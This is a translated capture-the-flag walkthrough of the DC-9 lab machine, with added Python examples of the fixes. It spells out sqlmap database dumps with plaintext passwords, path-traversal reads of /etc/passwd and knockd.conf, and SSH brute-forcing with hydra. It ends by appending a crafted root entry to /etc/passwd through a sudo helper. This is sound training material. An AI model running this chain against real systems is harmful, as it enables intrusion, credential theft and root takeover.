Penetration Testing: DC-9 Drone

1. Scan to obtain the IP address of the target machine

arp-scan -l


192.168.203.148

2. Obtain website information

1. nmap

nmap -sV -A 192.168.203.148


Ports 22 and 80 are open

2. Wappalyzer

Visiting the home page, Wappalyzer identifies the web server as Apache 2.4.38.

3. dirb

dirb http://192.168.203.148

Nothing useful was found.

3. Analyze the website

Display lists all user records.

Search lets you look up a record by entering a first or last name.

Manage is the login form. We first suspected SQL injection there, but nothing was detected; in the end the injection turned out to be in Search.

4. Burp Suite

Capturing the request in Burp shows that the search term is sent as a POST parameter (search).
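To show the defect that sqlmap exploited in Search, here is an added Python/sqlite3 example (not the DC-9 application's own code, which is PHP): a lookup that splices the POST value into the query text, next to the parameterized form. The table and column names follow the dump on this page; the three sample rows are constructed.

```python
import sqlite3

# Constructed sample rows modelled on the UserDetails dump shown on this page.
SAMPLE_USERS = [
    ("Mary", "Moe", "marym"),
    ("Fred", "Flintstone", "fredf"),
    ("Chandler", "Bing", "chandlerb"),
]


def build_db():
    """Create an in-memory UserDetails table holding the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE UserDetails (firstname TEXT, lastname TEXT, username TEXT)")
    conn.executemany("INSERT INTO UserDetails VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def search_vulnerable(conn, term):
    """The defect sqlmap found: the POST 'search' value is spliced into the SQL text,
    so quotes in the term change the query instead of being matched literally."""
    sql = ("SELECT firstname, lastname FROM UserDetails "
           f"WHERE firstname = '{term}' OR lastname = '{term}'")
    return conn.execute(sql).fetchall()


def search_fixed(conn, term):
    """Hardened form: bound parameters keep the term as data, never as SQL."""
    sql = ("SELECT firstname, lastname FROM UserDetails "
           "WHERE firstname = ? OR lastname = ?")
    return conn.execute(sql, (term, term)).fetchall()


if __name__ == "__main__":
    db = build_db()
    probe = "x' OR '1'='1"      # the kind of input an injection scanner sends
    print("vulnerable:", search_vulnerable(db, probe))   # every row comes back
    print("fixed:     ", search_fixed(db, probe))        # no row matches literally
```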

5. sqlmap

Save the captured request to 1.txt and feed it to sqlmap.

Enumerate the databases:

sqlmap -r /root/1.txt -p search --dbs

Enumerate the tables:

sqlmap -r /root/1.txt -p search -D users --tables

Enumerate the columns:

sqlmap -r /root/1.txt -p search -D users -T UserDetails --columns

Dump the fields:

sqlmap -r /root/1.txt -p search -D users -T UserDetails -C firstname,lastname,username,password --dump

+-----------+------------+-----------+---------------+
| firstname | lastname   | username  | password      |
+-----------+------------+-----------+---------------+
| Mary      | Moe        | marym     | 3kfs86sfd     |
| Julie     | Dooley     | julied    | 468sfdfsd2    |
| Fred      | Flintstone | fredf     | 4sfd87sfd1    |
| Barney    | Rubble     | barneyr   | RocksOff      |
| Tom       | Cat        | tomc      | TC&TheBoyz    |
| Jerry     | Mouse      | jerrym    | B8m#48sd      |
| Wilma     | Flintstone | wilmaf    | Pebbles       |
| Betty     | Rubble     | bettyr    | BamBam01      |
| Chandler  | Bing       | chandlerb | UrAG0D!       |
| Joey      | Tribbiani  | joeyt     | Passw0rd      |
| Rachel    | Green      | rachelg   | yN72#dsd      |
| Ross      | Geller     | rossg     | ILoveRachel   |
| Monica    | Geller     | monicag   | 3248dsds7s    |
| Phoebe    | Buffay     | phoebeb   | smellycats    |
| Scooter   | McScoots   | scoots    | YR3BVxxxw87   |
| Donald    | Trump      | janitor   | Ilovepeepee   |
| Scott     | Morrison   | janitor2  | Hawaii-Five-0 |
+-----------+------------+-----------+---------------+

None of these accounts can log in to the web application. SSH was tried as well, but port 22 is filtered. So dump the other database (Staff):

sqlmap -r /root/1.txt -p search -D Staff --tables
sqlmap -r /root/1.txt -p search -D Staff -T Users --columns
sqlmap -r /root/1.txt -p search -D Staff -T Users --dump

+--------+--------------------------------------------------+----------+
| UserID | Password                                         | Username |
+--------+--------------------------------------------------+----------+
| 1      | 856f5de590ef37314e7c3bdf6f8a66dc (transorbital1) | admin    |
+--------+--------------------------------------------------+----------+

Credentials: admin / transorbital1

Logged in successfully.

After login, the message "File does not exist" appears at the bottom of the page, which strongly suggests a local file inclusion (LFI).

wfuzz -p 127.0.0.1:8080:HTTP             # -p: send requests through a proxy (Burp)

Wordlist source: https://github.com/danielmiessler/SecLists

We use the burp-parameter-names.txt wordlist from it.

Use Burp to fuzz the parameter name:

http://192.168.203.148/manage.php?a=../../../../etc/passwd

This reveals that the parameter name is file.

Check the Linux scheduler's task list through ../../../../../../proc/sched_debug:

http://192.168.203.148/manage.php?file=../../../../../../proc/sched_debug
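An added example, not part of the original walkthrough, of how manage.php's file parameter could have been handled safely: the include name is restricted to an allowlist of page names inside the document root, so traversal values like the ones above are refused. WEB_ROOT and ALLOWED_PAGES are assumed values, not taken from the machine.

```python
import os
from pathlib import Path

# Assumed values: the site's document root and the only pages manage.php may include.
WEB_ROOT = Path("/var/www/html")
ALLOWED_PAGES = {"welcome.php", "display.php", "search.php", "manage.php"}


class IncludeRejected(ValueError):
    """Raised when a 'file' value must not be passed to include()."""


def resolve_include(file_param: str) -> Path:
    """Map the 'file' query parameter to a path that is safe to include.

    Three checks, each of which alone stops '../../../../etc/passwd':
    1. the value must be a bare filename (no directory components),
    2. it must be on the allowlist of page names,
    3. the resolved path must still be inside WEB_ROOT.
    """
    if not file_param or file_param != os.path.basename(file_param):
        raise IncludeRejected("directory components are not allowed")
    if file_param not in ALLOWED_PAGES:
        raise IncludeRejected("not an includable page")
    candidate = (WEB_ROOT / file_param).resolve(strict=False)
    if WEB_ROOT.resolve(strict=False) not in candidate.parents:
        raise IncludeRejected("path escapes the web root")
    return candidate


def is_safe_include(file_param: str) -> bool:
    """Boolean wrapper for callers that only need accept/reject."""
    try:
        resolve_include(file_param)
        return True
    except IncludeRejected:
        return False


if __name__ == "__main__":
    for value in ("manage.php", "../../../../etc/passwd",
                  "../../../../../../proc/sched_debug", "/etc/passwd"):
        print(f"{value!r}: {'include' if is_safe_include(value) else 'reject'}")
```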


4. Connection

The output shows that the system runs the knockd service (port knocking).

Read the knockd configuration file:

http://192.168.203.148/manage.php?file=../../../../../etc/knockd.conf

Method 1, using nc: knock on ports 7469, 8475 and 9842 in that order to open the door:

nc 192.168.203.148 7469
nc 192.168.203.148 8475
nc 192.168.203.148 9842

Method 2, using nmap:

nmap -p 7469 192.168.203.148
nmap -p 8475 192.168.203.148
nmap -p 9842 192.168.203.148

Use hydra to find out which of the dumped users can log in over SSH. Save the usernames and passwords as user.txt and pwd.txt respectively.
Note: the wordlists must not contain spaces.

hydra -L user.txt -P pwd.txt 192.168.203.148 ssh

login: chandlerb   password: UrAG0D!
login: joeyt       password: Passw0rd
login: janitor     password: Ilovepeepee

SSH connection:

ssh janitor@192.168.203.148

Log in with one of the brute-forced users and run ls -la (which also lists hidden entries). In janitor's home directory there is a hidden directory, secrets-for-putin, containing the password file passwords-found-on-post-it-notes.txt.

BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

Add these passwords to the password file and run hydra again:

hydra -L user.txt -P pwd.txt 192.168.203.148 ssh

A new user is found:

login: fredf   password: B4-Tru3-001

SSH connection

5. Privilege escalation

ssh fredf@192.168.203.148
sudo -l

sudo -l shows that fredf can run a file as root with NOPASSWD (no password required).

Running it prints a usage message: run it as python test.py with arguments.

Enter the /opt/devstuff directory; it contains test.py.

Meaning: the script takes three arguments (the script name and two files) and appends the contents of the file named by the second argument to the file named by the third; the test binary under the test directory can be executed with root privileges.

Idea: construct a passwd entry with root privileges (UID 0), append it to /etc/passwd, and log in with that account to obtain root.

Generate a password hash with openssl:

openssl passwd -1 -salt js 233333


$1$js$8LV1DbndSIfP29vG.eYaj1

Write the passwd entry to a file in /tmp:

echo 'js:$1$js$8LV1DbndSIfP29vG.eYaj1:0:0::/root:/bin/bash' > /tmp/js

Run test:

cd /opt/devstuff/dist/test
sudo ./test /tmp/js /etc/passwd

Login as the new account succeeds; it has root privileges, so the flag can be read.
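The root cause of this escalation is a NOPASSWD helper that appends any file to any other file, which is a root-level write primitive. As an added example (not the machine's test.py) here is the same append operation with the destination confined to one directory, so a request such as (/tmp/js, /etc/passwd) is refused; ALLOWED_DEST_DIR is an assumed path.

```python
import sys
from pathlib import Path

# Assumed: the only directory the helper is meant to write into (not from the page).
ALLOWED_DEST_DIR = Path("/opt/devstuff/data")


class AppendRefused(PermissionError):
    """Raised when an append request must not be carried out as root."""


def check_destination(dst: str, allowed_dir: Path = ALLOWED_DEST_DIR) -> Path:
    """Return the resolved destination if it lies inside allowed_dir, else raise.

    resolve() follows symlinks and collapses '..', so both
    '/opt/devstuff/data/../../../etc/passwd' and a symlink planted inside the
    directory that points at /etc/passwd end up outside allowed_dir and are refused.
    """
    dst_path = Path(dst)
    if not dst_path.is_absolute():
        raise AppendRefused("destination must be an absolute path")
    if dst_path.is_symlink():
        raise AppendRefused("destination may not be a symlink")
    resolved = dst_path.resolve(strict=False)
    root = allowed_dir.resolve(strict=False)
    if root not in resolved.parents:
        raise AppendRefused(f"{resolved} is outside {root}")
    return resolved


def is_allowed_destination(dst: str, allowed_dir: Path = ALLOWED_DEST_DIR) -> bool:
    """Boolean form of check_destination for callers that only need accept/reject."""
    try:
        check_destination(dst, allowed_dir)
        return True
    except AppendRefused:
        return False


def safe_append(src: str, dst: str) -> int:
    """Append src to dst only after the destination check; returns bytes written."""
    dest = check_destination(dst)
    data = Path(src).read_bytes()
    with open(dest, "ab") as out:
        return out.write(data)


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit("usage: safe_append.py SRC DST")
    try:
        print(f"appended {safe_append(sys.argv[1], sys.argv[2])} bytes")
    except AppendRefused as err:
        sys.exit(f"refused: {err}")
```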


Source: blog.csdn.net/weixin_46706771/article/details/119880428